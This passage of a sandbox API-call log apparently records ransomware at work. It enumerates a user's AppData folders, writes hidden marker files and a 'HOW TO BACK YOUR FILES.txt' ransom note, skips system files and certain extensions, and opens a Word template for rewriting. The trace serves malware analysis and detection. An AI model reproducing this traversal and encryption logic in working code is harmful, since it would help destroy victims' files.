hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0054.344] FlushFileBuffers (hFile=0x2c4) returned 1 [0054.345] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.346] CloseHandle (hObject=0x2c4) returned 1 [0054.346] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned 66 [0054.346] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.346] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32ff935, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x85685687, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73248 [0054.346] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.346] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.346] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0054.346] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.346] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32ff935, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x85685687, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.346] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.347] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.347] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0054.347] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.347] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.347] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x85685687, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x85685687, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x85685687, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.347] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.347] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.347] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x3325b84, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0054.347] lstrcmpiW (lpString1="1033", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.347] lstrcmpiW (lpString1="1033", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.348] lstrcmpiW (lpString1="1033", lpString2="Tiger4444.exe") returned -1 [0054.348] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0054.348] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0054.348] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0054.348] lstrcmpiW (lpString1="1033", lpString2="bootmgr") returned -1 [0054.348] lstrcmpiW (lpString1="1033", lpString2="pagefile.sys") returned -1 [0054.348] lstrcmpiW (lpString1="1033", lpString2="boot") returned -1 [0054.348] lstrcmpiW (lpString1="1033", lpString2="ids.txt") returned -1 [0054.348] lstrcmpiW (lpString1="1033", lpString2="NTUSER.DAT") returned -1 [0054.348] lstrcpyW (in: lpString1=0x30aeb2e, lpString2="1033" | out: lpString1="1033") returned="1033" [0054.348] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66560 [0054.348] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x90) returned 0xc85d28 [0054.348] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66568 | out: ListHead=0xc66828, ListEntry=0xc66568) returned 0xc66528 [0054.348] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x3325b84, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0054.348] FindClose (in: hFindFile=0xc73248 | out: hFindFile=0xc73248) returned 1 [0054.348] lstrcpyW (in: lpString1=0x30aeb2e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.348] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0054.349] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0054.349] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0054.350] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0054.350] CloseHandle (hObject=0x2b8) returned 1 [0054.350] CloseHandle (hObject=0x2c4) returned 1 [0054.350] GetCurrentThreadId () returned 0xfa8 [0054.350] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66568 [0054.350] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0054.350] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc85d28 | out: hHeap=0xc50000) returned 1 [0054.350] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66560 | out: hHeap=0xc50000) returned 1 [0054.350] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0054.350] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\" [0054.350] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\.BFC0E91B00AE8A0620D3" [0054.350] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0054.351] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0054.353] FlushFileBuffers (hFile=0x2c4) returned 1 [0054.354] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.354] CloseHandle (hObject=0x2c4) returned 1 [0054.355] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned 71 [0054.355] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.355] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x856ab884, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0054.355] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.355] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.355] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0054.355] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.355] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x856ab884, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.355] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.355] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.355] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0054.355] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.355] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.355] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x856ab884, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x856ab884, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x856ab884, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.355] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.355] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.355] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x3325b84, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 1 [0054.355] lstrcmpiW (lpString1="16", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.355] lstrcmpiW (lpString1="16", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.355] lstrcmpiW (lpString1="16", lpString2="Tiger4444.exe") returned -1 [0054.355] lstrcmpiW (lpString1="16", lpString2=".") returned 1 [0054.355] lstrcmpiW (lpString1="16", lpString2="..") returned 1 [0054.355] lstrcmpiW (lpString1="16", lpString2="windows") returned -1 [0054.355] lstrcmpiW (lpString1="16", lpString2="bootmgr") returned -1 [0054.355] lstrcmpiW (lpString1="16", lpString2="pagefile.sys") returned -1 [0054.355] lstrcmpiW (lpString1="16", lpString2="boot") returned -1 [0054.356] lstrcmpiW (lpString1="16", lpString2="ids.txt") returned -1 [0054.356] lstrcmpiW (lpString1="16", lpString2="NTUSER.DAT") returned -1 [0054.356] lstrcpyW (in: lpString1=0x30aeb38, lpString2="16" | out: lpString1="16") returned="16" [0054.356] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66560 [0054.356] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x96) returned 0xc854e8 [0054.356] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66568 | out: ListHead=0xc66828, ListEntry=0xc66568) returned 0xc66528 [0054.356] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x3325b84, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0054.356] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0054.356] lstrcpyW (in: lpString1=0x30aeb38, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.356] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0054.356] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0054.356] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0054.357] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0054.357] CloseHandle (hObject=0x2b8) returned 1 [0054.357] CloseHandle (hObject=0x2c4) returned 1 [0054.357] GetCurrentThreadId () returned 0xfa8 [0054.357] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66568 [0054.357] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0054.357] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc854e8 | out: hHeap=0xc50000) returned 1 [0054.357] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66560 | out: hHeap=0xc50000) returned 1 [0054.357] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0054.357] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\" [0054.357] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\.BFC0E91B00AE8A0620D3" [0054.357] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0054.358] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0054.360] FlushFileBuffers (hFile=0x2c4) returned 1 [0054.361] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.361] CloseHandle (hObject=0x2c4) returned 1 [0054.361] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned 74 [0054.361] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.361] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x334bde3, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x856ab884, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f08 [0054.361] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.361] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.361] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0054.361] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.361] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x334bde3, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x856ab884, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.362] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.362] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.362] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0054.362] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.362] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.362] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x856ab884, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x856ab884, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x856ab884, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.362] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.362] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.362] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334bde3, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x334bde3, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x584285c, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0054.362] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.362] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.362] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="Tiger4444.exe") returned -1 [0054.362] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2=".") returned 1 [0054.362] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="..") returned 1 [0054.362] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="windows") returned -1 [0054.362] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="bootmgr") returned 1 [0054.362] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="pagefile.sys") returned -1 [0054.362] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="boot") returned 1 [0054.362] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="ids.txt") returned -1 [0054.362] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="NTUSER.DAT") returned -1 [0054.362] lstrcpyW (in: lpString1=0x30aeb3e, lpString2="Built-In Building Blocks.dotx" | out: lpString1="Built-In Building Blocks.dotx") returned="Built-In Building Blocks.dotx" [0054.362] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx", dwFileAttributes=0x0) returned 1 [0054.362] lstrlenW (lpString="Built-In Building Blocks.dotx") returned 29 [0054.362] lstrlenW (lpString="Tiger4444") returned 9 [0054.362] lstrcmpiW (lpString1="ocks.dotx", lpString2="Tiger4444") returned -1 [0054.362] lstrlenW (lpString=".dll") returned 4 [0054.362] lstrcmpiW (lpString1="dotx", lpString2=".dll") returned 1 [0054.362] lstrlenW (lpString=".lnk") returned 4 [0054.362] lstrcmpiW (lpString1="dotx", lpString2=".lnk") returned 1 [0054.368] lstrlenW (lpString=".ini") returned 4 [0054.368] lstrcmpiW (lpString1="dotx", lpString2=".ini") returned 1 [0054.368] lstrlenW (lpString=".sys") returned 4 [0054.368] lstrcmpiW (lpString1="dotx", lpString2=".sys") returned 1 [0054.368] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0054.368] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0054.368] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14582156369) returned 1 [0054.368] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=3706055) returned 1 [0054.369] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0054.369] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0054.369] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x388fd0, lpName=0x0) returned 0x2cc [0054.370] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x188fd0) returned 0x30b0000 [0054.749] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3240000 [0054.891] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0055.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0055.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0055.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0055.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0055.031] RtlAllocateHeap 